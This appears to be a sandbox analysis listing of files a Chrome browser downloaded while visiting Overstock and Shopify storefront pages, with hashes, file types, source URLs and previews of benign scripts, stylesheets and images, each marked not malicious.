                                                                                                                                                                                    MD5:52DB3EA5677943064FB20324A04DC772
                                                                                                                                                                                    SHA1:479BA4C0BFD3AC9A8A11DFC52A5F619168C76960
                                                                                                                                                                                    SHA-256:E88DBA4058FA38A58B8BFDA0281E7BFB1FFE9FF2F8858A1F329239D33C5715D8
                                                                                                                                                                                    SHA-512:5D7DED91E4A13B1AA5B8BDE90B02616209886E21CF59EBF28FFD0BC602D93F170632403367DAE5FB084A085A9A3A2B2FE74E48E69CD53990F69BC30777494E70
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("variant-picker")){class VariantPicker extends HTMLElement{constructor(){super(),this.section=this.closest(".js-product"),this.productForm=this.section.querySelector(".js-product-form-main"),this.optionSelectors=this.querySelectorAll(".option-selector"),this.data=this.getProductData(),this.variant=this.getSelectedVariant(),this.updateAvailability(),this.updateAddToCartButton(),this.addEventListener("change",this.handleVariantChange.bind(this))}handleVariantChange(evt){this.variant=null,this.variant=this.getSelectedVariant(),this.variant&&(this.updateMedia(),this.updateUrl(evt),this.updateVariantInput()),this.updateAddToCartButton(),this.updateAvailability(),this.updatePrice(),this.updateWeight(),this.updateBarcode(),this.updateBackorderText(),this.updatePickupAvailability(),this.updateSku(),VariantPicker.updateLabelText(evt),this.dispatchEvent(new CustomEvent("on:variant:change",{bubbles:!0,detail:{form:this.productForm,variant:this.variant,product:this.data.prod
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (31991)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):67422
                                                                                                                                                                                    Entropy (8bit):5.440861073280608
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:8ZtTQh899C5kd0aNC47my8VQxwY6NpXifr40/QuXBTVILhjch/Weq4uuxRm6koDe:W9C5kvGy8VkwsGV/gECbY/
                                                                                                                                                                                    MD5:5828BC58662DF552EAC51592D9A4BBE1
                                                                                                                                                                                    SHA1:D8642F1A7D5472F383260831B6591C436AB7872A
                                                                                                                                                                                    SHA-256:97D46D9FCA545D7ECC9FC81E71A3C3168EE2DAFEB86E051168772D2E8A2FDC67
                                                                                                                                                                                    SHA-512:0A0529A03AE6B065FF94B683508B4B1BED818FD06C3672CAB0F7BC2A289F8F7E91E2CAFC2C86B3DB1FE4E93FC61AECD49EE80C553A6153102548EEBED9C5E913
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/VisitorAPI.97d46d9fca545d7ecc9fc81e71a3c3168ee2dafeb86e051168772d2e8a2fdc67.js
                                                                                                                                                                                    Preview:!function e(t,i,n){function r(s,o){if(!i[s]){if(!t[s]){var l="function"==typeof require&&require;if(!o&&l)return l(s,!0);if(a)return a(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var c=i[s]={exports:{}};t[s][0].call(c.exports,function(e){var i=t[s][1][e];return r(i||e)},c,c.exports,e,t,i,n)}return i[s].exports}for(var a="function"==typeof require&&require,s=0;s<n.length;s++)r(n[s]);return r}({1:[function(e,t,i){(function(i){e("./utils/polyfills");var n=e("./strategies/LocalVisitor"),r=e("./strategies/ProxyVisitor"),a=e("./strategies/PlaceholderVisitor"),s=e("./utils/callbackRegistryFactory"),o=e("./Message"),l=e("./enums"),u=l.MESSAGES;t.exports=function(e,t,l,c){function d(e){Object.assign(I,e)}function f(e){Object.assign(I.state,e),I.callbackRegistry.executeAll(I.state)}function g(e){if(!A.isInvalid(e)){v=!1;var t=A.parse(e);I.setStateAndPublish(t.state)}}function _(e){!v&&C&&(v=!0,A.send(c,e))}function m(){d(new n(l._generateID)),I.getMarket
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):94798
                                                                                                                                                                                    Entropy (8bit):3.716220284965788
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:vR8ZV9N5OSCtueoPKd+3yHm17+ZV9N5OSCtueoPKd+3yHm17fwz:94T
                                                                                                                                                                                    MD5:D8716B59D1B30B018F00E26D949878CD
                                                                                                                                                                                    SHA1:01129C4961F1B2D7FD95B726AC59EEFE220002A5
                                                                                                                                                                                    SHA-256:CE879E9E2187EC88F3CFC3D5A2A2EEE01A5B6255CAED7E943D723D63C7007CBF
                                                                                                                                                                                    SHA-512:CED43482F3C7DEB46641C8D82972D1CF0255C5485DC83056FFA365BDA0D9E1ED70C451C79365E4771A19D8212C8EA19E7CD4324839263A8AD3C3B778AD4E6163
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_910x60_Flyout_SalesDealsBanner_Desktop.svg
                                                                                                                                                                                    Preview:<svg width="910" height="60" viewBox="0 0 910 60" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect width="910" height="60" fill="#F5BB5C"/>.<path d="M185.354 22.178C189.862 22.178 192.298 25.062 192.298 29.122V38.25H186.782V29.486C186.782 27.47 185.634 26.294 183.534 26.294C181.714 26.294 180.146 27.162 178.97 29.066V38.25H173.454V22.738V17.53H178.97V23.074V25.202C180.286 23.27 182.582 22.178 185.354 22.178ZM205.253 38.894C199.009 38.894 195.089 35.674 195.089 30.494C195.089 25.286 199.009 22.122 205.253 22.122C211.469 22.122 215.389 25.286 215.389 30.494C215.389 35.674 211.469 38.894 205.253 38.894ZM205.253 34.638C208.081 34.638 210.125 33.21 210.125 30.494C210.125 27.75 208.081 26.35 205.253 26.35C202.425 26.35 200.381 27.75 200.381 30.494C200.381 33.21 202.425 34.638 205.253 34.638ZM242.628 22.178C247.108 22.178 249.236 25.146 249.236 29.122V38.25H243.748V29.43C243.748 27.498 242.74 26.294 240.696 26.294C238.932 26.294 237.56 27.246 236.552 29.066V29.122V35.366L236.58 38.25H231
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2213
                                                                                                                                                                                    Entropy (8bit):6.89276226472952
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxasjmUWSl5z0DiPo7dORmtsTwoZfj:NBIl/XrxFjmklytamyvL
                                                                                                                                                                                    MD5:77FD62FAEE3B2C4D1C0F61FDB511BA04
                                                                                                                                                                                    SHA1:D1053656F55203E6BCEA3D8D878D775B5CCA5B71
                                                                                                                                                                                    SHA-256:98533D7CB18662825D1A06BE293BA03FCA1020FFE807B35FAD51B18FCABE684A
                                                                                                                                                                                    SHA-512:B4C895982651083598FD966DDB810AFFF376B80F451C84F4DB03BE6F6417A42D2FBE22096C9621DD5CABCAF5B30DF0A409DB76E1FEA621F01E3106B263E1EDF3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................X...........i..1..#....?O-.oK.9..<.{T.YVij.X.z/....{t.;.!...9.,..x.nt......5..J........h..............9..........................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):83
                                                                                                                                                                                    Entropy (8bit):5.0289819083000395
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:jdJMeXecRmKYE1wcLbklBMvLACv:jdJM3cRDjAs
                                                                                                                                                                                    MD5:0951B3AE1D7C646591AF0A4B13F356EF
                                                                                                                                                                                    SHA1:9972523ED2314A487131F39E48010C02A905B139
                                                                                                                                                                                    SHA-256:6AF0272E00008D3EB784E33F1CAB4D3FDAABE262F6078FF1DD84FD456D21C2A3
                                                                                                                                                                                    SHA-512:1F882A83422D5AE1293BDB6A7BE1A459B1DC4EB6F2EED412C046C15E09BD3097B57C5ABEC71C0DB6B44A771A86220444495591331F5FD25E90542783E2F632DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Section.sQehCocD.css
                                                                                                                                                                                    Preview:.WPQk2{color:var(--x-default-color-accent)}.qReyn>button{display:block;width:100%}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4717), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4717
                                                                                                                                                                                    Entropy (8bit):5.0231454692467095
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:x9yTUdsZTmzDXHyHkz/93yN1X6VA/+fO/HYU1:nyTUCSDHyHW/93yNtmAm2/N
                                                                                                                                                                                    MD5:9A39012D8B21FD48BC886557A71DE05B
                                                                                                                                                                                    SHA1:0513D36ADD1A40C327DCEDBF6740400143BDF3E7
                                                                                                                                                                                    SHA-256:2432D4D714F569FB026AC1272B385CC0C13A5C820AB4AE88E907B4DCC13C8F9D
                                                                                                                                                                                    SHA-512:BA6D35BDDF90FF260C3388C247EF6ED9F97938471F2D6FBF97E741FC5809B7FAECACA6454958AC4DE21459CFF2A6C6A8E52EE4EAF4915198F4264F7F14C1C8FC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-web-sdk-script.min.js?api_key=f835946b-0d19-4768-88b1-9c8df850c4bc&content_cards=false&in_browser_msgs=false&sdk_url=sdk.iad-03.braze.com&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}const t=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-web-sdk-script")));const s=new URLSearchParams(t.search);const r=Object.fromEntries(s.entries());if(!document.querySelector("script[src*='braze.min.js']")&&!document.querySelector("script[src*='braze.no-amd.min.js']")&&!document.querySelector("script[src*='appboy.min.js']")&&!document.querySelector("script[src*='appboy.no-amd.min.js']")&&!window.braze&&!window.appboy){+function(e,t,s,r,o){e.braze={};e.brazeQueue=[];for(var n="BrazeSdkMetadata DeviceProperties Card Card.prototype.dismissCard Card.prototype.removeAllSubscriptions Card.prototype.removeSubscription Card.prototype.subscribeToClickedEvent Card.prototype.subscribeToDismissedEvent Card.fromContentCardsJson ImageOnly CaptionedImage ClassicCard ControlCard ContentCards ContentCards.prototype.getUnviewedCardCount Feed Feed.prototyp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5991)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):274905
                                                                                                                                                                                    Entropy (8bit):5.569851583045088
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:lQuwiztGbETratosy0Z5CptDY8/I8+yU/OUYhcDmKD0C8Gp/36G:BGbg+toCMYGUTx0C8Gp/3h
                                                                                                                                                                                    MD5:E138B69D81FD6D4DD2792F9623AE4F8B
                                                                                                                                                                                    SHA1:48BEB7189583DB0245E4EBCE513C2732C60E9ABB
                                                                                                                                                                                    SHA-256:D5285BF4AA5E416CFE0B183CE3639C35B4ED763E9C8E2EC1E31F2396E1E5DC8B
                                                                                                                                                                                    SHA-512:84720A7D4FB2FFFCF585B5C6186ADFAE55D7325F8D4B242B076B15B59885CF40D3CDEB63203F54E354F1D4419D5331B6B5E3F4BE865CFFE2C8709C19D993511F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/destination?id=AW-1069816607&l=dataLayer&cx=c
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_auto_events","priority":21,"vtp_enableScroll":true,"vtp_enableOutboundClick":true,"vtp_enableDownload":true,"vtp_enableHistoryEvents":true,"vtp_enableForm":true,"vtp_enableVideo":true,"vtp_enablePageView":true,"tag_id":9},{"function":"__ogt_cross_domain","priority":21,"vtp_rules":["list","bedbathandbeyond\\.ca$","bedbathandbeyond\\.com$"],"tag_id":11},{"function":"__ogt_ads_datatos","priority":21,"vtp_instanceDestinationId":"AW-1069816607","tag_id":22},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2159), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2159
                                                                                                                                                                                    Entropy (8bit):5.187883475890047
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6KLxP8Njis5O3sqw0TjnHuBAz3Cs0JFf2EwM5ccR5P/4hx95Ts7W:RVqjrTaqADCvFf2vsXvPAnL+W
                                                                                                                                                                                    MD5:5737D20E84D62E43284A5575D810A012
                                                                                                                                                                                    SHA1:0261F4E3A0CCD50821BC00B3C81040A2990ABCE0
                                                                                                                                                                                    SHA-256:7C37E17BFEB054B199C90965D335D1DA2455954BB849B754262C1BF2F98594F9
                                                                                                                                                                                    SHA-512:7C17F7335E0AEA6B2A0D0AE3F725187208EDEC9587DFAE1906D01D9B6ECCCD2F03DF67D8EE693DEDECC9C11DB2FBD34277D600A4D8D8981A088FACCB8B5B1B18
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function r(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function o(e){const t=100;window.setTimeout(function(){if(r()!==null&&r().getUser()){e()}else{o(e)}},t)}function s(e,o,n){fetch(e+".js").then(e=>e.json()).then(e=>{var t={id:e.id,title:e.title,price:e.price,vendor:e.vendor,images:e.images,shopify_storefront:n};r().logCustomEvent(o,t);r().requestImmediateDataFlush()})}function n(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-product-script")));const t=new URLSearchParams(e.search);return Object.fromEntries(t.entries())}function u(e){const t=e.lastIndexOf("/")+1;const o=e.indexOf("?")>0?e.indexOf("?"):e.length;return e.substring(t,o)}function c(e,t,o,n,r,i){productName=u(t);const c=JSON.parse(localStorage.getItem(o)||"{}");lastEventTimeForProduct=c[productNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 56x56, segment length 16, progressive, precision 8, 1480x1480, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):195602
                                                                                                                                                                                    Entropy (8bit):7.980012666325044
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:p53R9xGAdXhmYy6tV3vfZ5T9+/rxrgl/OGuBEK7SzJB2fl1uCA/6iZ:p53ngt8XZ5T9WdglRuvkQe
                                                                                                                                                                                    MD5:08A1302D0CF092AC933AE28E32F402BF
                                                                                                                                                                                    SHA1:352BD3D1DA3628AC412AB273B3EF073503EAE48C
                                                                                                                                                                                    SHA-256:D8CAD0AEB1B79B122E2CFDAD4B418FB3B73C58EFE8F1E2B61AA2D5A19D6089E9
                                                                                                                                                                                    SHA-512:FCF433AA07E4508E55B6CC53FD0409229EB3E3E657550711BF7765F8EB61CF4E7EE258D38DD82414A674415528F7147230AD707D95CACB02F00CD3E221E51D3C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF.....8.8......................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C............."..........3.................................................................}o..................I. ..... ................. ..!.....A0.$.......I....L.I......H@......A0LHA!......HA!....HD.D........!.,...LX........`.D............B..$ ..`.$.....@........&...B..$...`.................. ..(...............$"@......... .......P.............."`.@...............s................H.L.!..................D..................!...@.............A!............................Y....L.......IPL(......H."q.$X$ ..B..$...B..$ ..@...b.(........ ....H&.....$ ..B..$ ...............`. .$ ..(& ....(&......$ ..`.....$ ..B..$H.@...B....H$ .....G.!.'|.......i&..A%@...8.l.......$ .....$ ..B...........P.......... ..(.............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x238, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6904
                                                                                                                                                                                    Entropy (8bit):7.973203182186079
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:h9lYZfag3aah3n0opdC9uAwaoPXnIHBZPF:Xwfag3aahFC9uXir
                                                                                                                                                                                    MD5:A4A593FBB1C7F78A7937C24A22F913D5
                                                                                                                                                                                    SHA1:2B2D7679ED239B8D258317A0C4E4E5ACBCF8C098
                                                                                                                                                                                    SHA-256:C9138CB7FF1CEC08AF85C8615A31BC914DDD2E516E0523282EB4132AAA823A20
                                                                                                                                                                                    SHA-512:6934452663A624F3F386FE2CEFE2C56308BCB257044F96A220C78CF469AB2CA15CB163F61ED8C5197960840B8D73914BB3683A5387EC9FD437566214EDAA1EE7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_Domestic_Bento2.jpg?imwidth=640
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....?.~.V.'.7%tK".".en.?H...Ue.w....d.S.....e...;D..~.......w_.:mk.z.k..z.W.z.z;...".;Y>...x....y.........U.E..%.F..[...rv.......)Bd...:,z.q~....>=.|..w.._..7..... 87....0]RpZ.~.....s....XL.....|!Y....n5...$.d....j....../.AO];..}{...t.......c.1'.rJ..y#.*O............m....B.`.O.1.Y,..L..%.f@.....F..@....bt7.SXq.f$a.q...Ocr.T.i.._...8.n.8x.'._..g....]u...a..N.E.d.`..9.....A.s-(.X...8..{......<o..o.nYN%_0..2>...=@!:.~H.....V;.[..LZ.....w....h....@2....<c.p.8q@...O.Y~..x..Y........J....n.....b...L.s....!.b.........s....~.....6.,....Q....|.O....z....@`...t}...._[.9..hS.^...jz.WG.sa.]_.,.;P.qG.8.*.4..z..Zl.|P.d.-.}s...u....,...,..].2.r..P...'b..F.y....ga.J....rV_Y...Y....Dt...w2-".{..........5.2.0....(..,.h.Wr....f........0.0..K..n.O...j.[.f......g.>4...9...;...O%!.0q....m.k..2...G..r+...O..S.@.....y........$Y..j<..^.Y...O.lO<.t. ...K....}fSQ<.G...A....S....p.{.....px.}.%=...v.z..!.....D.&...4c.}`..).. ......5T..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (336)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                    Entropy (8bit):5.083093074926281
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:giPtydgJowCfMCgCfMClS4QaEoWH1ARMAsk7v:giPtyeJFLjLqsosCRZXr
                                                                                                                                                                                    MD5:642173BE054799A424915838F618D190
                                                                                                                                                                                    SHA1:C2EB119D3CDA65072343E80FC341116931E2CED3
                                                                                                                                                                                    SHA-256:2792BF612B0764521F758C6C458A332BF0F42F312C8D27EBE6F8F465FC0F3B45
                                                                                                                                                                                    SHA-512:3C63CEFCB0FF7C97A4843BB204FA4E722C3756F9BE9717B8B00D0BC58B4B82BB35BF46ED6EE1423E0CF2C477922502B352094118A2C62CDB27AB7BCEDB2FD7AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm/strict/app/web-pixel-shopify-app-pixel@0220.js
                                                                                                                                                                                    Preview:shopify.extend('WebPixel::Render', function (api) {. var analytics=api.analytics,browser=api.browser,init=api.init;. var e=api._pixelInfo?api._pixelInfo.runtimeContext:null,n=api._pixelInfo?api._pixelInfo.type:null;analytics.subscribe("all_standard_events",(function(i){var l,o;l=i.name,o=i,browser.localStorage.getItem("shopify-pixel-mode").then((function(i){"debug"===i&&console.log(`[shopify-pixel][${n}][${e}] ${l}`,o)})).catch((function(){}))}));.});.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):4.772163314390804
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3://OYpNXDQNIYUqBiIYjfSyYzLvxRKC:3Pj0NJUTJKx
                                                                                                                                                                                    MD5:D8C268E7C3CF2A526CCA6CF68DAA5B4E
                                                                                                                                                                                    SHA1:7396FEBA9C82D8D572744C5CBBF7ABC864849B67
                                                                                                                                                                                    SHA-256:CFA5FE1780028DCD88EF9087303662301D5F27F96527B41E11334919B071B32D
                                                                                                                                                                                    SHA-512:22668BC067449A6C45D58D26A044BAB447ACDA7A8DE1CE876BB33965ABE1B1108E0FD4434E9A01EF7F751A4BFC5AE2D534B8F3D76409FCB2BDB43C153835372B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayLoginLoader.CjGSo8kt.css
                                                                                                                                                                                    Preview:._5Z70J{border-radius:var(--x-global-border-radius, var(--x-border-radius-base));display:flex;flex:1}.oSdnC{margin:auto}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2319)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):968831
                                                                                                                                                                                    Entropy (8bit):5.31962929537484
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:YMa64WUciIlKptgv6FzZ84zYipmPUjoaGcELRZVIsYf:YY4WM
                                                                                                                                                                                    MD5:8BE65C44ADD89FCA4084D545C8A4335C
                                                                                                                                                                                    SHA1:E8DA0914C1D61356CF5735BFCA8EF78F4D3DFD98
                                                                                                                                                                                    SHA-256:375DF3C0AE262C5BD42A8AAB9301D9A20031C81653EE3295251F4057EEA91B6A
                                                                                                                                                                                    SHA-512:115C19643AB803049B7EBEADE9E961F290FCFEF068FDA1B3611A9601BAE3E73E08D841351943E0EDEEAB86C95AB63430D33375CC179D0524733A9203C32F9E50
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<div id="shopify-section-template--16930125217951__main" class="shopify-section cc-main-product product-main"><link href="//www.overstock.com/cdn/shop/t/224/assets/component-rating.css?v=111083418062392971531730157903" rel="stylesheet" type="text/css" media="all" />..<link rel="stylesheet" href="//www.overstock.com/cdn/shop/t/224/assets/component-reviews.css?v=95942729648472401811730157903" media="print" onload="this.media='all'">.<link rel="stylesheet" href="//www.overstock.com/cdn/shop/t/224/assets/os-pdp.css?v=82570473233433357701730157903" media="print" onload="this.media='all'">.<link href="//www.overstock.com/cdn/shop/t/224/assets/product.css?v=81253555964418955201730157903" rel="stylesheet" type="text/css" media="all" />.<link href="//www.overstock.com/cdn/shop/t/224/assets/product-page.css?v=7214178851081366811730157903" rel="stylesheet" type="text/css" media="all" />.<link href="//www.overstock.com/cdn/shop/t/224/assets/component-reference-pricing.css?v=16003236879009617643173
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3088)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3089
                                                                                                                                                                                    Entropy (8bit):5.366611758291363
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:MAWewyEhHOiaRrOGcpjTfovoa6KPrf1Z2SPEZlEpJWAN:TWz9huipjTjhKPrhJWa
                                                                                                                                                                                    MD5:604ECA43D36B0C6FD3C03E72E23EC0DA
                                                                                                                                                                                    SHA1:091179EA80344796A16605C499D1537460401393
                                                                                                                                                                                    SHA-256:E859BA643A9330D67E7BCE6333E5A3420790F654A6F6057E4066E8DDFB90391C
                                                                                                                                                                                    SHA-512:A0725F3FF2A7CCD386328223EEC386310C289A05DA0581FB766692F2933CB9B18CD4236CF8EF5A6918403A86756243702A9033188AA6BFFFD28769B59E7AB002
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/vsearch-facetssearchresultswrapper.Cuju1057.js
                                                                                                                                                                                    Preview:import{c as k,j as s,r as u}from"./vsearch-vendor.2xH_R9Qb.js";import{c as w,U as W,T as X,g as I,M as K,a as q,u as z,D as $,R as H,b as J,F as S,N as Q,d as V,S as Y,P as Z,e as j,f as ss,h as ts,i as es,j as as,k as P,p as F,r as R}from"./vsearch-autocomplete.CGRHStzc.js";const os="_wrapper_9ao0v_1",rs="_facets_9ao0v_14",cs="_searchResults_9ao0v_64",ns="_resultsSummary_9ao0v_70",ds="_sortedByDropdown_9ao0v_75",us="_productGrid_9ao0v_80",ls="_pagination_9ao0v_86",is="_isLoading_9ao0v_91",t={wrapper:os,facets:rs,searchResults:cs,resultsSummary:ns,sortedByDropdown:ds,productGrid:us,pagination:ls,isLoading:is},v=k.bind(t),ps=()=>{const[a,l]=u.useState(!0),[c,E]=u.useState(!1),[e,_]=u.useState({facets:[],taxonomyFacets:[],products:[],resultCount:0}),g=I()=="DESKTOP"?K:q,{urlState:n,patchUrlState:x}=z(),d=e.resultCount,N=Math.min(Math.ceil(d/(j+g)),es),C=d>1,A=e.products.length>0&&!c,O=e.products.length===0&&!a&&!c,D=e.products.length===0&&a&&!c,y=+n.page||+$,L=as({totalProductsCount:d,cu
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):280698
                                                                                                                                                                                    Entropy (8bit):7.9993659376305555
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:HQrmQc5dqvsATM3uY0tmU4azNr6hJsuTZkLJtxI:HQrmPPfed/EhJxNkT2
                                                                                                                                                                                    MD5:5867B5457001E60F952065A1299ADFAB
                                                                                                                                                                                    SHA1:EB388BEE70DED312B2D900AA1CA915340514304F
                                                                                                                                                                                    SHA-256:EE45E1590E87CC375CB256161F20B4077133763DF39007063BB2C151863F8C3E
                                                                                                                                                                                    SHA-512:3010C2BD6B11E04D949B3CF123186D4B01549815AEF12A5B936427B05F40B40BA8F998631983F276F6B32C7C0C7C9335DF67A9B0B63EA091CF541E6C4919A418
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/40d9ee3ae415fd1c4b8a50245f4b51866b3e1ac7/Hawthorne-Steel-Glider-Recliner-by-Christopher-Knight-Home.jpg?imwidth=900&impolicy=high
